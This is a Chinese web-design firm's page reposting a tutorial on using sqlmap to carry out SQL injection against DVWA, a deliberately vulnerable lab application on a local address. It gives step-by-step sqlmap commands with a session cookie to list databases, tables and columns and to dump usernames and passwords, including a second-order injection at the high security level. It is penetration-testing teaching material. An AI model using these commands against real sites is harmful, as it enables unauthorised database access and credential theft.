网创优客建站品牌官网
为成都网站建设公司企业提供高品质网站建设
热线:028-86922220
成都专业网站建设公司

定制建站费用3500元

符合中小企业对网站设计、功能常规化式的企业展示型网站建设

成都品牌网站建设

品牌网站建设费用6000元

本套餐主要针对企业品牌型网站、中高端设计、前端互动体验...

成都商城网站建设

商城网站建设费用8000元

商城网站建设因基本功能的需求不同费用上面也有很大的差别...

成都微信网站建设

手机微信网站建站3000元

手机微信网站开发、微信官网、微信商城网站...

建站知识

当前位置:首页 > 建站知识

Sqlmap自动化注入的示例分析

本篇文章给大家分享的是有关Sqlmap自动化注入的示例分析,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。

创新互联长期为数千家客户提供的网站建设服务,团队从业经验10年,关注不同地域、不同群体,并针对不同对象提供差异化的产品和服务;打造开放共赢平台,与合作伙伴共同营造健康的互联网生态环境。为任丘企业提供专业的成都做网站、成都网站设计,任丘网站改版等技术服务。拥有10余年丰富建站经验和众多成功案例,为您定制开发。

使用sqlmap对dvwa进行自动化注入
 设置dvwa级别为low

  1. 打开dvwa的SQL Injection(SQL Injection (Blind)),打开浏览器调试,输入user id并submit,查看拦截到的请求。

  2. 可以看到是一条GET请求,url“http://192.168.1.222:8089/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#”

  3. 我们直接放到salmap测试一下,使用-u命令 -u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#"

  4. 可以看到这里是需要登录的,否则跑不出来。所以我们需要添加一个cookie维持登录

    6.使用burp suite代理抓包,获取登录的cookie,添加--dbs 爆数据 -u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --    cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" --dbs

       可以看到爆出来的数据库是MySQL

      7. 我们用-D xxx指定查看的数据库,用--tables查看该数据库的所有表:-u            "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa --tables

查看跑出来的结果:

8.我们用-D xxx -T ttt指定查看的表,用--columns查看表的列

-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T users --columns

9.我们用-D xxx查看数据库, -T xxx指定查看的表,用-C xxx查看表的列,用-dump查看列的数据

-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low" -D dvwa -T users -C password,user --dump

  • 将dvwa安全等级调为medium将抓取的数据包保存为.txt文件,放到sqlmap的目录下,直接-r 文件名 --dbs(后续的参数自己添加即可)

  • 将dvwa 安全等级调为high。由于这次的提交页面跟返回结果的页面不是同一个页面,所以之前的那种方法在这里不能用了。要使用二阶注入的方法

  • 提交数据的网址             

  • 返回的网址

       将抓取的数据包保存为.txt文件,放到sqlmap的目录下,爆数据库,命令: -r           1.txt --second-url"http://192.168.1.222:8089/vulnerabilities/sqli/" --           batch --level 2 --dbs

       

       爆表名

      -r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" -        -batch --level 2 -D dvwa --tables

      

      爆列名

      -r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" 

     -- batch --level 2 -D dvwa -T user --columns

     

     爆字段数据

   -r 1.txt --second-url "http://192.168.1.222:8089/vulnerabilities/sqli/" --       batch --level 2 -D dvwa -T users -C user,password --dump

   

  • 一些概念问题:

  • 二阶注入:二阶sql注入--second-order有些时候注入点输入的数据看返回结果的时候并不是 当前的页面,而是另外的一个页面, 这时候就需要你指定到哪个页面获取响应判断真假。–second-url 后面跟一个返回的页面的URL地址

  • --batch:自动默认配置,不用手动按yes or no

  • level :Sqlmap一共有5个探测等级,默认是1。等级越高,说明探测时使用的payload也越多。其中5级的payload最多,会自动破解出cookie、XFF等头部注入。当然,等级越高,探测的时间也越慢。这个参数会影响测试的注入点,GET和POST的数据都会进行测试,HTTP cookie在level为2时就会测试,HTTP  User-Agent/Referer头在level为3时就会测试。在不确定哪个参数为注入点时,为了保证准确性,建议设置level为5(速度也随之变慢)

以上就是Sqlmap自动化注入的示例分析,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注创新互联行业资讯频道。


文章标题:Sqlmap自动化注入的示例分析
链接地址:http://bjjierui.cn/article/jdseoe.html

其他资讯